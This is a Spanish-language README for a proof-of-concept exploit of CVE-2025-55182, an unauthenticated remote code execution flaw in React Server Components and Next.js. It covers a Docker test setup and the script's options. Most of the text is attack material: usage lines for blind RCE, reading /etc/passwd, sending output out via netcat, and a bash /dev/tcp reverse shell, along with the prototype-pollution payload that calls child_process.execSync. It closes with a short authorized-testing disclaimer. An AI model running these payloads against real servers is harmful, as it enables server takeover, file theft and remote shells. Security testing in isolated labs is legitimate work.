
CVE-2025-55182 React2Shell PoC
Un exploit de prueba de concepto para CVE-2025-55182, una vulnerabilidad crítica (CVSS 10.0) de ejecución remota de código no autenticada en React Server Components.
Descubierto por Lachlan Davidson - Reportado al equipo de Meta/React el 29 de noviembre de 2025.
La vulnerabilidad se encuentra en la lógica de deserialización del protocolo React Flight. Al enviar un payload malicioso mediante HTTP POST, un atacante puede lograr una contaminación de prototipos (prototype pollution) que conduce a la ejecución arbitraria de código en el servidor.
| Paquete | Versiones vulnerables |
|---|---|
| react-server-dom-webpack | 19.0.0, 19.1.0, 19.1.1, 19.2.0 |
| react-server-dom-parcel | 19.0.0, 19.1.0, 19.1.1, 19.2.0 |
| react-server-dom-turbopack | 19.0.0, 19.1.0, 19.1.1, 19.2.0 |
| Next.js | 15.0.4, 15.1.8, 15.2.5, 15.3.5, 15.4.7, 15.5.6, 16.0.6 |
.
├── exploit.py # exploit script
├── docker-compose.yml # Vulnerable test environment
├── vulnerable-app/ # Vulnerable Next.js application
└── README.md
docker compose up -d
Esto inicia una aplicación Next.js vulnerable en http://localhost:3000.
python3 exploit.py -u http://localhost:3000 --check
Esto realiza una comprobación no explotativa de indicadores, incluyendo:
python3 exploit.py -u http://localhost:3000 -c "id"
Ejecuta un comando sin ver la salida. Compruébalo con:
python3 exploit.py -u http://localhost:3000 -c "id" --exfil <IP>:<PORT>
Tu dirección IP; Puerto a la escucha
usage: exploit.py [-h] -u URL [-c COMMAND] [--check] [--exfil HOST:PORT]
[--timeout TIMEOUT] [--no-verify]
options:
-u, --url URL Target URL
-c, --command CMD Command to execute
--check Check if vulnerable (non-exploitative)
--exfil HOST:PORT Exfiltrate output to HOST:PORT
--timeout TIMEOUT Request timeout (default: 10)
--no-verify Disable SSL verification
# Check vulnerability
python3 exploit.py -u http://localhost:3000 --check
# Blind RCE
python3 exploit.py -u http://localhost:3000 -c "touch /tmp/pwned"
# RCE with output
python3 exploit.py -u http://localhost:3000 -c "whoami" --exfil 172.17.0.1:9999
# Read files
python3 exploit.py -u http://localhost:3000 -c "cat /etc/passwd" --exfil 172.17.0.1:9999
# Reverse shell
python3 exploit.py -u http://localhost:3000 -c "bash -c 'bash -i >& /dev/tcp/172.17.0.1/4444 0>&1'"
{
"then": "$1:__proto__:then",
"status": "resolved_model",
"reason": -1,
"value": "{\"then\": \"$B0\"}",
"_response": {
"_prefix": "process.mainModule.require('child_process').execSync('id');",
"_formData": {
"get": "$1:constructor:constructor"
}
}
}
El exploit corrompe el estado del servidor durante la ejecución, lo que hace que la exfiltración de respuestas en banda no sea fiable. El flag --exfil utiliza exfiltración fuera de banda:
┌──────────┐ 1. Malicious POST ┌──────────┐
│ Attacker │ ──────────────────► │ Server │
└──────────┘ └──────────┘
▲ │
│ 3. Command output │ 2. RCE executes:
│ via nc │ cmd | nc attacker port
│ ▼
└─────────────────────────────────┘
docker compose down
Esta herramienta es únicamente para pruebas de seguridad autorizadas y fines educativos. Úsala solo contra sistemas en los que tengas permiso para realizar pruebas.